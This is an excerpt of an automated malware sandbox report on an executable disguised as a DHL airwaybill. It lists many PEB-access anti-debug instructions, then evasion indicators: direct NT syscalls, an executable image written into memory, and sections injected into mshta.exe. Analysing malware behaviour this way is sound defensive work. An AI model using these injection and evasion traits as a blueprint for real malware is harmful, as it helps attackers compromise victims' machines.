            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B962A0 mov eax, dword ptr fs:[00000030h]3_2_01B962A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B962A0 mov eax, dword ptr fs:[00000030h]3_2_01B962A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B962A0 mov eax, dword ptr fs:[00000030h]3_2_01B962A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B962A0 mov eax, dword ptr fs:[00000030h]3_2_01B962A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E284 mov eax, dword ptr fs:[00000030h]3_2_01B3E284
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E284 mov eax, dword ptr fs:[00000030h]3_2_01B3E284
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B80283 mov eax, dword ptr fs:[00000030h]3_2_01B80283
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B80283 mov eax, dword ptr fs:[00000030h]3_2_01B80283
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B80283 mov eax, dword ptr fs:[00000030h]3_2_01B80283
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B102E1 mov eax, dword ptr fs:[00000030h]3_2_01B102E1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B102E1 mov eax, dword ptr fs:[00000030h]3_2_01B102E1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B102E1 mov eax, dword ptr fs:[00000030h]3_2_01B102E1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD62D6 mov eax, dword ptr fs:[00000030h]3_2_01BD62D6
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A2C3 mov eax, dword ptr fs:[00000030h]3_2_01B0A2C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A2C3 mov eax, dword ptr fs:[00000030h]3_2_01B0A2C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A2C3 mov eax, dword ptr fs:[00000030h]3_2_01B0A2C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A2C3 mov eax, dword ptr fs:[00000030h]3_2_01B0A2C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A2C3 mov eax, dword ptr fs:[00000030h]3_2_01B0A2C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF823B mov eax, dword ptr fs:[00000030h]3_2_01AF823B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF826B mov eax, dword ptr fs:[00000030h]3_2_01AF826B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B04260 mov eax, dword ptr fs:[00000030h]3_2_01B04260
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B04260 mov eax, dword ptr fs:[00000030h]3_2_01B04260
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B04260 mov eax, dword ptr fs:[00000030h]3_2_01B04260
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD625D mov eax, dword ptr fs:[00000030h]3_2_01BD625D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B06259 mov eax, dword ptr fs:[00000030h]3_2_01B06259
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBA250 mov eax, dword ptr fs:[00000030h]3_2_01BBA250
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBA250 mov eax, dword ptr fs:[00000030h]3_2_01BBA250
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B88243 mov eax, dword ptr fs:[00000030h]3_2_01B88243
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B88243 mov ecx, dword ptr fs:[00000030h]3_2_01B88243
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFA250 mov eax, dword ptr fs:[00000030h]3_2_01AFA250
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B245B1 mov eax, dword ptr fs:[00000030h]3_2_01B245B1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B245B1 mov eax, dword ptr fs:[00000030h]3_2_01B245B1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B805A7 mov eax, dword ptr fs:[00000030h]3_2_01B805A7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B805A7 mov eax, dword ptr fs:[00000030h]3_2_01B805A7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B805A7 mov eax, dword ptr fs:[00000030h]3_2_01B805A7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E59C mov eax, dword ptr fs:[00000030h]3_2_01B3E59C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B02582 mov eax, dword ptr fs:[00000030h]3_2_01B02582
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B02582 mov ecx, dword ptr fs:[00000030h]3_2_01B02582
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B34588 mov eax, dword ptr fs:[00000030h]3_2_01B34588
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B025E0 mov eax, dword ptr fs:[00000030h]3_2_01B025E0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3C5ED mov eax, dword ptr fs:[00000030h]3_2_01B3C5ED
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3C5ED mov eax, dword ptr fs:[00000030h]3_2_01B3C5ED
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B065D0 mov eax, dword ptr fs:[00000030h]3_2_01B065D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A5D0 mov eax, dword ptr fs:[00000030h]3_2_01B3A5D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A5D0 mov eax, dword ptr fs:[00000030h]3_2_01B3A5D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E5CF mov eax, dword ptr fs:[00000030h]3_2_01B3E5CF
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E5CF mov eax, dword ptr fs:[00000030h]3_2_01B3E5CF
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10535 mov eax, dword ptr fs:[00000030h]3_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10535 mov eax, dword ptr fs:[00000030h]3_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10535 mov eax, dword ptr fs:[00000030h]3_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10535 mov eax, dword ptr fs:[00000030h]3_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10535 mov eax, dword ptr fs:[00000030h]3_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10535 mov eax, dword ptr fs:[00000030h]3_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E53E mov eax, dword ptr fs:[00000030h]3_2_01B2E53E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E53E mov eax, dword ptr fs:[00000030h]3_2_01B2E53E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E53E mov eax, dword ptr fs:[00000030h]3_2_01B2E53E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E53E mov eax, dword ptr fs:[00000030h]3_2_01B2E53E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E53E mov eax, dword ptr fs:[00000030h]3_2_01B2E53E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B96500 mov eax, dword ptr fs:[00000030h]3_2_01B96500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3656A mov eax, dword ptr fs:[00000030h]3_2_01B3656A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3656A mov eax, dword ptr fs:[00000030h]3_2_01B3656A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3656A mov eax, dword ptr fs:[00000030h]3_2_01B3656A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B08550 mov eax, dword ptr fs:[00000030h]3_2_01B08550
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B08550 mov eax, dword ptr fs:[00000030h]3_2_01B08550
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B344B0 mov ecx, dword ptr fs:[00000030h]3_2_01B344B0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8A4B0 mov eax, dword ptr fs:[00000030h]3_2_01B8A4B0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B064AB mov eax, dword ptr fs:[00000030h]3_2_01B064AB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBA49A mov eax, dword ptr fs:[00000030h]3_2_01BBA49A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B004E5 mov ecx, dword ptr fs:[00000030h]3_2_01B004E5
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A430 mov eax, dword ptr fs:[00000030h]3_2_01B3A430
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFC427 mov eax, dword ptr fs:[00000030h]3_2_01AFC427
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFE420 mov eax, dword ptr fs:[00000030h]3_2_01AFE420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFE420 mov eax, dword ptr fs:[00000030h]3_2_01AFE420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFE420 mov eax, dword ptr fs:[00000030h]3_2_01AFE420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B38402 mov eax, dword ptr fs:[00000030h]3_2_01B38402
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B38402 mov eax, dword ptr fs:[00000030h]3_2_01B38402
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B38402 mov eax, dword ptr fs:[00000030h]3_2_01B38402
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2A470 mov eax, dword ptr fs:[00000030h]3_2_01B2A470
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2A470 mov eax, dword ptr fs:[00000030h]3_2_01B2A470
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2A470 mov eax, dword ptr fs:[00000030h]3_2_01B2A470
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B24A35 mov eax, dword ptr fs:[00000030h]3_2_01B24A35
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3CA38 mov eax, dword ptr fs:[00000030h]3_2_01B3CA38
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3CA24 mov eax, dword ptr fs:[00000030h]3_2_01B3CA24
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2EA2E mov eax, dword ptr fs:[00000030h]3_2_01B2EA2E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8CA11 mov eax, dword ptr fs:[00000030h]3_2_01B8CA11
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7CA72 mov eax, dword ptr fs:[00000030h]3_2_01B7CA72
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7CA72 mov eax, dword ptr fs:[00000030h]3_2_01B7CA72
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BAEA60 mov eax, dword ptr fs:[00000030h]3_2_01BAEA60
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3CA6F mov eax, dword ptr fs:[00000030h]3_2_01B3CA6F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3CA6F mov eax, dword ptr fs:[00000030h]3_2_01B3CA6F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3CA6F mov eax, dword ptr fs:[00000030h]3_2_01B3CA6F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtUnmapViewOfSection: Direct from: 0x77382D3C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtQueryInformationToken: Direct from: 0x77382CAC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtOpenKeyEx: Direct from: 0x77382B9C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtCreateFile: Direct from: 0x77382FEC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtOpenFile: Direct from: 0x77382DCC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe NtTerminateThread: Direct from: 0x77377B2E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Memory written: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Section loaded: NULL target: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe Section loaded: NULL target: C:\Windows\SysWOW64\mshta.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mshta.exe Section loaded: NULL target: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe protection: read write
